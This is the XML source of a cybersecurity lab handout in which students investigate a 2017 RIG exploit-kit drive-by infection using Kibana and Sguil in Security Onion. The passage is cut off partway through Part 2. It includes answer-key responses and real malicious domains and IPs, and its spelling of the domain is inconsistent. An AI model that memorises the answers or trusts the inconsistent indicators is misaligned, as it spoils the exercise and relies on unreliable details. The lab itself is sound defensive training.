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pacing w:before="60" w:after="60"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:contextualSpacing/>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Information Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="000000"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="000000"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="000000"/>
        </w:pBd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lang w:val="en-KG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 11: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-KG"/>
        </w:rPr>
        <w:t>Endpoint Security and Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="000000"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="000000"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="000000"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="5040" w:leader="none"/>
        </w:tabs>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ab/>
      </w:r>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sdt>
        <w:sdtPr>
          <w:id w:val="1622735848"/>
          <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
          <w:placeholder>
            <w:docPart w:val="09951B049F3C25469B3156B7C2067A04"/>
          </w:placeholder>
          <w:alias w:val="Title"/>
          <w:text/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr/>
            <w:t>Lab 40 - Investigating a Malware Exploit</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numP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ind w:left="0" w:hanging="0"/>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Objectives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lab you will:</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1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b w:val="false"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Kibana to Learn About a Malware Exploit.</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2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b w:val="false"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Investigate the Exploit with Sguil.</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3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b w:val="false"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Wireshark to Investigate an Attack.</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4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b w:val="false"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Examine Exploit Artifacts.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This lab is based on an exercise from the website malware-traffic-analysis.net which is an excellent resource for learning how to analyze network and host attacks. Thanks to brad@malware-traffic-analysis.net for permission to use materials from his site.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="InstNoteRed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This lab requires a host computer that can access the internet.</w:t>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Background / Scenario</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You have decided to interview for a job in a medium sized company as a Tier 1 cybersecurity analyst. You have been asked to demonstrate your ability to pinpoint the details of an attack in which a computer was compromised. Your goal is to answer a series of questions using Sguil, Kibana, and Wireshark in Security Onion.</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You have been given the following details about the event:</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event happened in January of 2017.</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It was discovered by the Snort NIDS.</w:t>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Required Resources</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Security Onion virtual machine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Bulletlevel1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Internet access</w:t>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Instructions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Use Kibana to Learn About a Malware Exploit</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Part 1, use Kibana to answer the following questions. To help you get started, you are informed that the attack took place at some time during January 2017. You will need to pinpoint the exact time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="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Narrow the timeframe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="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Login to Security Onion with the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username and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password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1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Open Kibana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and set an Absolute time range to narrow the focus to log data from January 2017.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1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You will see a graph appear with a single entry showing. To view more details, you need to narrow the amount of time that is displayed. Narrow the time range in the Total Log Count Over Time visualization by clicking and dragging to select an area around the graph data point. You may need to repeat this process until you see some detail in the graph.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5030470" cy="1939925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 7" descr="Screenshot of dashboard for the time period Jan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Screenshot of dashboard for the time period Jan 2017. "/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5030470" cy="1939925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Use the &lt;Esc&gt; key to close any dialog boxes that may be interfering with your work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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Locate the Event in Kibana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1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After narrowing the time range in the main Kibana dashboard, go to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NIDS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alert Data dashboard by clicking NIDS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5380990" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 5" descr="screenshot of dashboard filtered for NIDS ale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screenshot of dashboard filtered for NIDS alert data."/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5380990" cy="2552700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1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Zoom in on the event by clicking and dragging in the NIDS – Alerts Over Time visualization further focus in on the event timeframe. Since the event happened over a very short period of time, select just the graph plot line. Zoom in until your display resembles the one below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="2188845"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 12" descr="screenshot of dashboard filtered for NIDS alert data zoom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screenshot of dashboard filtered for NIDS alert data zoomed in"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2188845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1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Click the first point on the timeline to filter for only that first event.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5436870" cy="1678940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 14" descr="screenshot of the first eve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screenshot of the first event highlighted"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5436870" cy="1678940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1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Now view details for the events that occurred at that time. Scroll all the way to the bottom of the dashboard until you see the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NIDS Alerts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> section of the page. The alerts are arranged by time. Expand the first event in the list by clicking the pointer arrow that is to the left of the timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5473700" cy="1865630"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Picture 15" descr="A screenshot of results of NID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A screenshot of results of NIDS alerts"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5473700" cy="1865630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>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Look at the expanded alert details and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time of the first detected NIDS alert in Kibana?</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Jan 27, 2017 – 22:54:43</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is the source IP address in the alert?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172.16.4.193</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IP address in the alert?</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194.87.234.129</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is the destination port in the alert? What service is this?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HTTP and 80</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is the classification of the alert?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Trojan</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destination geo country name?</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Russia</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1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a web browser on a computer that can connect to the internet, go to the link that is provided in the signature_info field of the alert. This will take you to the Emerging Threats Snort alert rule for the exploit. There are a series of rules shown. This is because signatures can change over time, or new and more accurate rules are developed. The newest rule is at the top of the page. Examine details of the rule.</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malware family for this event?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Exploit_Kit_RIG</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severity of the exploit?</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signature severity is Major.</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an Exploit Kit? (EK) Search on the internet to answer this question.</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computer with malware.</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Exploit kits frequently use what is called a drive-by attack to begin the attack campaign. In a drive-by attack, a user will visit a website that should be considered safe. However, threat actors find ways to compromise legitimate websites by finding vulnerabilities on the webservers that host them. The vulnerabilities allow threat actors to insert their own malicious code into the HTML of a webpage. The code is frequently inserted into an iFrame. iFrames permit content from different websites to be displayed in the same webpage. Threat actors will frequently create an invisible iFrame that connects the browser to a malicious website. The HTML from the website that is loaded into the browser often contains a JavaScript that will send the browser to yet another malicious website or download malware until the computer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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View the Transcript capME!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2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Click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>alert _id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> value, you can pivot to CapME to inspect the transcript of the event.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="1733550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Picture 17" descr="screenshot of alert _id highlighted in the first NIDS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screenshot of alert _id highlighted in the first NIDS log entry"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1733550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:keepNext w:val="true"/>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the CapME! window you can see the transcript from the session. It shows the transactions between the source computer, in blue, and the destinations that are accessed by the source. A lot of valuable information, including a link to the pcap file that is related to this alert, is available in the transcript.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5683250" cy="3455035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Picture 19" descr="screenshot of transcript for the first NID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descr="screenshot of transcript for the first NIDS alert."/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5683250" cy="3455035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Examine the first block of blue text. This is the request from the source to the destination webserver. Note that two URLs are listed in this block. The first is tagged as SRC: REFERER. This is the website that the source computer first accessed. However, the server referred browser the HTTP GET request to the SRC:HOST. Something in the HTML sent the source to this site. It looks like this could be a drive-by attack!</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website did the user intend to connect to?</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www.homeimprovement.com</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URL did the browser refer the user to?</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ty.benme.com</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kind of content is requested by the source host from tybenme.com? Why could this be a problem? Look in the DST server block of the transcript too.</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substance is appeared as gzip. This can be a malware record that has been asked for download. It is likely a malware record. Since it is compressed, the contents of the record are jumbled. It isn't simple to see what is within the record.</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2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Close the CapME! browser tab.</w:t>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From the top of the NIDS Alert Dashboard click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> entry located under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zeek Hunting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> heading.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2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HTTP dashboard, verify that your absolute time range includes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2017-01-27 22:54:30.000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2017-01-27 22:56:00.000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2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to the HTTP - Sites section of the dashboard.</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some of the websites that are listed?</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t>www.bing.com</w:t>
        <w:br/>
        <w:t>p27dokhpz2n7nvgr.1jw2lx.top</w:t>
        <w:br/>
        <w:t>homeimprovement.com</w:t>
        <w:br/>
        <w:t>tyu.benme.com</w:t>
        <w:br/>
        <w:t>www.google-analytics.com</w:t>
        <w:br/>
        <w:t>api.blockcipher.com</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 should know some of these websites from the transcript that we read earlier. Not all of the sites that are shown are part of the exploit campaign. Research the URLs by searching for them on the internet. Do not connect to them. Place the URLs in quotes when you do your searches.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Which of these sites is likely part of the exploit campaign?</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val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
        </w:rPr>
        <w:t>p27dokhpz2n7nvgr.1jw2lx.top</w:t>
        <w:br/>
        <w:t>homeimprovement.com</w:t>
        <w:br/>
        <w:t>tyu.benme.com</w:t>
        <w:br/>
        <w:t>spotsbill.com</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HTTP - MIME Types listed in the Tag Cloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>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image/jpeg, text/plain, text/html, image/gif, image/png, application/javascript, application/x-shockwave-flash, text/json</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2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Investigate the Exploit with Sguil</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Part 2, you will use Sguil to check the IDS alerts and gather more information about the series of events related to this attack.</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The alert IDs used in this lab are for example only. The alert IDs on your VM may be different.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2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Open Sguil and locate the alerts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2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Launch Sguil from the desktop. Login with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Enable all sensors and click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2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Locate the group of alerts from January 27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2017.</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According to Sguil, what are the timestamps for the first and last of the alerts that occurred within about a second of each other?</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22:54:42 to 22:55:28 The entire exploit occurred in less than a minute.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Investigate the alerts in Sguil.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>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Click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Show Packet Data</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bCs/>
        </w:rPr>
        <w:t>Show Rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> checkboxes to see the packet header field information and the IDS signature rule related to the alert.</w:t>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Select the alert ID 5.2 (Event message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ET CURRENT Evil Redirector Leading to EK Jul 12 2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
